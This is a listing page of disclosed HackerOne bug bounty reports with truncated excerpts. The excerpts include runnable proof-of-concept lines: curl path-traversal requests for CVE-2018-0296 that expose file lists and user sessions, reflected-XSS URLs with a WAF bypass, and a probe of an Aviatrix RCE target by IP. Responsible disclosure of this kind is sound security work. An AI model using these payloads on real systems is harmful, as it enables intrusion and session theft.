HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 1981 - 2000
##Description I discovered previously unidentified instance https://█████ (█████████████) in ██████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://███/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://███████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the …
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
Critical
$5,000
Closed
##Description Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25: **CVE-2019-11510 - Pre-auth Arbitrary File Reading** CVE-2019-11542 - Post-auth Stack Buffer Overflow **CVE-2019-11539 - Post-auth Command Injection** CVE-2019-11538 - Post-auth Arbitrary File Reading **CVE-2019-11508 - …
##Description I discovered previously unidentified instance https://█████████ (████.██████.mil) in █████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the …
I would like to report Path Traversal in statics-server # Module **module name:** statics-server **version:** 0.0.9 **npm page:** `https://www.npmjs.com/package/statics-server` ## Module Description > npm install statics-server -g Go to the folder you want to statics-server Run the server statics-server ## Module Stats > 80-100 downloads/month # Vulnerability ## Vulnerability Description …
Hi everyone, I would like to report here a Blind SSRF vulnerability through the Nextcloud `Mail` application. Tested on latest Mail release : `2.0.1` ## Steps To Reproduce: During the connection process of a mail account on the integrated Mail application of Nextcloud, once all the fields validated (IMAP, STMP …
## Summary: Team member with role USER can change notes of any users and also we able to inject some html tags ## Steps To Reproduce: 1. Login in with role `owner` create `note` 1. login team member with role `users` 1. add `note` and capture with `burp suite` and …
Summary Hi team, there's a reflected XSS on https://████ using the `plot` param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ███ ## Impact The attacker can trigger remote …
Summary Hi team, there's a reflected XSS on https://█████████ using the `project` param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ███ ## Impact The attacker can trigger remote …
Dear DoD - Team, I am able to execute javascript code on www.███████/News/Speeches. This endpoint has a search functionality with the parameter `Search`. The supplied value to this parameter gets embedded into the website. Furthermore the frontend of the website is presumably created with a template engine. These engines handle …
**Summary:** Recently you allowed us to give testimonials for the sandbox reports which is Vulnerable and allows all the researcher to control their **Testimonials** for their benefit t. **Description:** When a report is closed as resolved we are given the option of "This hacker is eligible for a testimonial" in …
This bug was reported directly to GitHub Security Lab.
## Summary: If an attacker can set environmental variables, curl will always crash with a buffer overflow when downloading a file – if the `--progress-bar` argument is set. ## Steps To Reproduce: Just run the following command on a **64-bit Linux** system (verified on Ubuntu 19.04). ```bash # Of course …
Hi H1, mattermost.cloud has a feature of making a channel and once its set to public any other user can join the channel and post comments on that channel. In System Console --> Channel --> Permission channel owner can assign wether member can post comment or not. Once channel owner …
An attacker can can upload malicious graphies via (http://graphie-to-png.kasandbox.org/) and (http://graphie-to-png.khanacademy.systems/) that exploit the graphie renderer. The attack targets any page that has a graphie (`khanacademy.org`!!), as well as `cdn.kastatic.org` and `ka-perseus-graphie.s3.amazonaws.com` # Proof of concept ## Step 1: Uploading a malicious graphie consider the following example where https://ka-perseus-graphie.s3.amazonaws.com/2122427aa8dc4ef2a59058bc1a7a934ba6ca6747.svg is …
After a credential has been added to vault.bitwarden.com (or any self-hosted installation), if the settings allow website icons to be fetched (https://bitwarden.com/help/article/website-icons/), the Bitwarden server will try to fetch the icon image. The relevant source code is https://github.com/bitwarden/server/blob/master/src/Icons/Controllers/IconsController.cs#L42-L65 and https://github.com/bitwarden/server/blob/master/src/Icons/Services/IconFetchingService.cs#L59 As we can see in the second link, just the …
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. The IP has a SSL certificate pointing to ElasticSearch. ``curl -kv https://52.204.160.31`` Output ``` Server certificate: * …